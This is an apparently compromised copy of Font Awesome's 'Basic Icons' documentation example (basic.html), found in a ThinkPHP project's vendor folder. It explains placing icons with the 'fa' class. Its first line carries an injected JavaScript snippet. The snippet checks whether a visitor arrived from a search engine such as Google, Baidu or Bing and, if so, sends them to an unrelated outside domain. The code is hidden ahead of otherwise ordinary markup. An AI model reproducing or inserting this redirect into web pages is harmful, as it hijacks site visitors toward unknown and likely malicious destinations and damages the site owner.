d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\_includes\examples\basic.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><section id="basic">
002:   <h2 class="page-header">
003:     Basic Icons
004:     <div class="pull-right text-default margin-top padding-top-sm hidden-xs">
005:       <a href="https://github.com/FortAwesome/Font-Awesome/blob/{{ site.fontawesome.doc_blob }}/less/core.less" class="text-muted padding-right">View LESS</a>
006:       <a href="https://github.com/FortAwesome/Font-Awesome/blob/{{ site.fontawesome.doc_blob }}/scss/_core.scss" class="text-muted">View SASS</a>
007:     </div>
008:   </h2>
009:
010:   <div class="row">
011:     <div class="col-md-3 col-sm-4">
012:       <p>
013:         <i class="fa fa-camera-retro"></i>
014:         <span class="sr-only">Example: basic icon</span>
015:         fa-camera-retro
016:       </p>
017:     </div>
018:     <div class="col-md-9 col-sm-8">
019:       <p>
020:         You can place Font Awesome icons just about anywhere using the CSS Prefix <code>fa</code> and the icon's
021:         name. Font Awesome is designed to be used with inline elements (we like the <code>&lt;i&gt;</code> tag for
022:         brevity, but using a <code>&lt;span&gt;</code> is more semantically correct).
023:       </p>
024: {% highlight html %}
025: <i class="fa fa-camera-retro"></i> fa-camera-retro
026: {% endhighlight %}
027:       <div class="alert alert-success">
028:         <ul class="fa-ul">
029:           <li>
030:             <i class="fa fa-info-circle fa-lg fa-li" aria-hidden="true"></i>
031:             <strong class="sr-only">Example: basic icon</strong>
032:             If you change the font-size of the icon's container, the icon gets bigger. Same things goes for color,
033:             drop shadow, and anything else that gets inherited using CSS.
034:           </li>
035:         </ul>
036:       </div>
037:     </div>
038:   </div>
039: </section>
040:
041:
042: